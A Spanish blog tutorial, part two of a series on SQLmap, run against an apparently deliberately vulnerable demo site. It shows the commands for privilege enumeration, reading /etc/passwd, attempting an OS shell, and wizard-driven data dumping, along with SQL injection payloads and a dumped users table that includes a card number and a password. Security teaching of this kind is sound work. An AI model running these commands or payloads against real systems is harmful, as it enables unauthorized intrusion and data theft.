SQLmap, herramienta imprescindible en tu arsenal II

Hoy vamos con la segunda parte de SQLmap. En la primera parte pudimos ver varios ejemplos para extraer información de una web que tiene inyección SQL.

Privilegios de usuario:

Dependiendo del usuario que corra en la base de datos poseerá unos privilegios u otros, con SQLmap podremos ver que es capaz de hacer este usuario. Lanzamos la herramienta con el flag correspondiente:

darkmac:sqlmap-dev marc$ python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –privileges

El output del resultado es:

[18:58:19] [INFO] fetching database users privileges database management system users privileges: [*] ‘acuart’@’localhost’ [1]: privilege: USAGE

Si hubieran mas de un usuario administrando la base de datos enumería los privilegios.

Leyendo ficheros remotos.

Si el usuario de la página web tiene permisos de escritura y lectura seremos capaces de descargarnos archivos del servidor web. El flag correspondiente es:

darkmac:sqlmap-dev marc$ python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –file-read=/etc/passwd

SQLmap descargá el fichero para que podamos leerlo luego mas tarde.

[19:00:24] [INFO] the back-end DBMS is MySQL web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL 5.0 [19:00:24] [INFO] fingerprinting the back-end DBMS operating system [19:00:25] [INFO] the back-end DBMS operating system is Linux [19:00:25] [INFO] fetching file: ‘/etc/passwd’ do you want confirmation that the remote file ‘/etc/passwd’ has been successfully downloaded from the back-end DBMS file system? [Y/n] Y [19:00:33] [WARNING] it looks like the file has not been written, this can occur if the DBMS process’ user has no write privileges in the destination path files saved to [1]: [*] /Users/marc/tools/pentest/web/sqlmap-dev/output/testphp.vulnweb.com/files/_etc_passwd (size differs from remote file) [19:00:33] [INFO] fetched data logged to text files under ‘/Users/marc/tools/pentest/web/sqlmap-dev/output/testphp.vulnweb.com’ [*] shutting down at 19:00:33

Shell en servidor

Si tenemos la suerte de poseer los permisos necesarios podremos ejecura una shell en el servidor. El flag correspondiente de SQLmap es:

darkmac:sqlmap-dev marc$ python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –os-shell

SQLmap nos preguntará de que tipo queremos la shell

which web application language does the web server support? [1] ASP [2] ASPX [3] JSP [4] PHP (default) >

Si no es capaz de encontrar el raíz nos preguntará por mas opciones, entre ellas está la de realizar ataques de fuerza bruta sobre el directorio web.

[19:48:18] [WARNING] unable to retrieve automatically the web server document root what do you want to use for web server document root? [1] common location(s) ‘/var/www/’ (default) [2] custom location [3] custom directory list file [4] brute force search

Las pruebas de fuerza bruta irán apareciendo por pantalla.

> 4 [20:01:31] [INFO] retrieved web server full paths: ‘/hj/var/www/listproducts.php’ [20:01:31] [INFO] trying to upload the file stager on ‘/var/www’ via LIMIT INTO OUTFILE technique [20:01:33] [INFO] heuristics detected web page charset ‘ascii’ [20:01:33] [WARNING] unable to upload the file stager on ‘/var/www’ [20:01:33] [INFO] trying to upload the file stager on ‘/var/www’ via UNION technique [20:01:36] [WARNING] expect junk characters inside the file as a leftover from UNION query [20:01:38] [WARNING] it looks like the file has not been written, this can occur if the DBMS process’ user has no write privileges in the destination path [20:01:40] [INFO] trying to upload the file stager on ‘/hj/var/www’ via LIMIT INTO OUTFILE technique [20:01:43] [WARNING] unable to upload the file stager on ‘/hj/var/www’ [20:01:43] [INFO] trying to upload the file stager on ‘/hj/var/www’ via UNION technique [20:01:43] [WARNING] it looks like the file has not been written, this can occur if the DBMS process’ user has no write privileges in the destination path [20:01:44] [INFO] trying to upload the file stager on ‘/var/www/html’ via LIMIT INTO OUTFILE technique [20:01:45] [WARNING] unable to upload the file stager on ‘/var/www/html’ [20:01:45] [INFO] trying to upload the file stager on ‘/var/www/html’ via UNION technique [20:01:47] [WARNING] it looks like the file has not been written, this can occur if the DBMS process’ user has no write privileges in the destination path [20:01:48] [INFO] trying to upload the file stager on ‘/var/www/htdocs’ via LIMIT INTO OUTFILE technique [20:01:48] [WARNING] unable to upload the file stager on ‘/var/www/htdocs’ [20:01:48] [INFO] trying to upload the file stager on ‘/var/www/htdocs’ via UNION technique [20:01:49] [WARNING] it looks like the file has not been written, this can occur if the DBMS process’ user has no write privileges in the destination path [20:01:50] [INFO] trying to upload the file stager on ‘/var/www/httpdocs’ via LIMIT INTO OUTFILE technique [20:01:51] [WARNING] unable to upload the file stager on ‘/var/www/httpdocs’ [20:01:51] [INFO] trying to upload the file stager on ‘/var/www/httpdocs’ via UNION technique [20:01:53] [WARNING] it looks like the file has not been written, this can occur if the DBMS process’ user has no write privileges in the destination path [20:01:53] [INFO] trying to upload the file stager on ‘/var/www/php’ via LIMIT INTO OUTFILE technique [20:01:54] [WARNING] unable to upload the file stager on ‘/var/www/php’ [20:01:54] [INFO] trying to upload the file stager on ‘/var/www/php’ via UNION technique [20:01:55] [WARNING] it looks like the file has not been written, this can occur if the DBMS process’ user has no write privileges in the destination path [20:01:57] [INFO] trying to upload the file stager on ‘/var/www/public’ via LIMIT INTO OUTFILE technique [20:01:58] [WARNING] unable to upload the file stager on ‘/var/www/public’ [20:01:58] [INFO] trying to upload the file stager on ‘/var/www/public’ via UNION technique [20:01:58] [WARNING] it looks like the file has not been written, this can occur if the DBMS process’ user has no write privileges in the destination path [20:01:58] [INFO] trying to upload the file stager on ‘/var/www/src’ via LIMIT INTO OUTFILE technique [20:02:04] [WARNING] unable to upload the file stager on ‘/var/www/src’

Automatizando mas aún la herramienta

Revisando las opciones de SQLmap me encontré con una que no conocía. Se trata de un wizard que hará por nosotros la extracción de los datos y las pruebas.

El flag es wizard.

darkmac:sqlmap-dev marc$ python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 –wizard

Nos irá preguntando por las opciones e irá lanzando los ataques.

POST data (–data) [Enter for None]: Injection difficulty (–level/–risk). Please choose: [1] Normal (default) [2] Medium [3] Hard > 1

Mas opciones

Enumeration (–banner/–current-user/etc). Please choose: [1] Basic (default) [2] Intermediate [3] All > 3

Irá extreyendo toda la información:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests: — Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind – WHERE or HAVING clause Payload: cat=1 AND 4891=4891 Type: error-based Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause Payload: cat=1 AND (SELECT 6213 FROM(SELECT COUNT(*),CONCAT(0x3a7862783a,(SELECT (CASE WHEN (6213=6213) THEN 1 ELSE 0 END)),0x3a716e663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) – 11 columns Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a7862783a,0x5564697071794f627263,0x3a716e663a),NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) — web application technology: Nginx, PHP 5.3.10 back-end DBMS operating system: Linux Ubuntu back-end DBMS: MySQL 5.0 banner: ‘5.1.69-0ubuntu0.10.04.1’ current user: ‘[email protected]’ current database: ‘acuart’ hostname: ‘rs202995’ current user is DBA: False database management system users [1]: [*] ‘acuart’@’localhost’

Al ser un wizard irá haciendo el ataque

do you want to crack them via a dictionary-based attack? [Y/n/q] Y what dictionary do you want to use? [1] default dictionary file ‘/Users/marc/tools/pentest/web/sqlmap-dev/txt/wordlist.zip’ (press Enter) [2] custom dictionary file [3] file with list of dictionary files > 1 do you want to use common password suffixes? (slow!) [y/N] N Database: acuart Table: users [1 entry] +———————+——+———————————-+——+——-+———+—————–+———————————+ | cc | name | cart | pass | uname | phone | email | address | +———————+——+———————————-+——+——-+———+—————–+———————————+ | 1234-5678-2300-9000 | ram | 18422368bd6d70df5d32f7f52bc76666 | test | test | 2323345 | [email protected] | ”| +———————+——+———————————-+——+——-+———+—————–+———————————+

En la última entrega veremos mas opciones disponibles, a disfrutar.


Si te ha gustado el post, compartelo y ayudanos a crecer.

Unete a nuestra Fanpage Siguenos en Twitter

Autor: Seifreed

Formado en un equipo de lucha contra el fraude. He trabajado implementando la protección y prevención del fraude en varios clientes dentro del sector bancario nacional e internacioal. Mi trabajo consiste en encontrar soluciones a los problemas actuales y futuros de las entidades financieras respecto al código malicioso y el fraude. Especialidades como el análisis de malware, análisis forense, ingeniería inversa o tareas de hacking ético, forman parte de mis tareas diarias. Soy ponente ien eventos nacionales (No cON Name, Owasp, Navaja Negra) e internacionales (DraonJAR CON - Colombia). Soy profesor asociado en La Salle enseñando el curso MPWAR (Master in High Performance Web Programming) y el máster de ciberseguridad de La Salle (MCS. Master in Cybersecurity) Miembro de asociaciones y grupos de research como la HoneyNet Project, Owasp, SySsec etc.. También soy el organizador de las conferencias Hack&Beers en Barcelona

Compartir este Artículo

Siguenos!

O Puedes Subscribete

ANTES DE

SALIRTE ...

NO TE

ARREPENTIRÁS

!Gracias¡

NO OLVIDES NUESTRAS REDES SOCIALES